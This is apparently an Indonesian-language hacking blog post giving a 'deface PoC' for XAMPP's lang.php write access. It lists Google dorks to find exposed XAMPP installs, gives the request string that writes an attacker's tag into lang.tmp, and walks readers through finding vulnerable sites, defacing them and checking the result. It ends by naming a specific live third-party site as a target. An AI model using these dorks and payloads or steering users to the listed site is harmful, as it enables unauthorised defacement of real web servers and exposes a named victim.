Deface Poc XAMPP Local Write Access (Live Target)
Friday, February 14, 2020
Edit
Dork :
inurl:/security/lang.php
inurl:/xampp/lang.php
Exploit :
/xampp/lang.php?PWNED_BY_(nickhekerlu). ( untuk dir xampp )
/security/lang.php?PWNED_BY_(nickhekerlu) (untuk dir security )
Dorking, lalu cari web yang menurut kalian Vuln kalau sudah ketemu web-nya, kalian masukkan exploitnya disamping url
Contoh: /security/lang.php?PWNED_BY_(nickhekerlu)
*NB : karna disini saya pakai dork yang inurl:security/lang.php maka exploitnya juga dir security
kalau kek gini bisa vuln bisa engak
cara cek vulnnya tinggal aja kasih exploit tadi, lalu panggil dengan site.com/security/lang.tmp
done terdeface
live target:
https://funtech.si/security/lang.tmp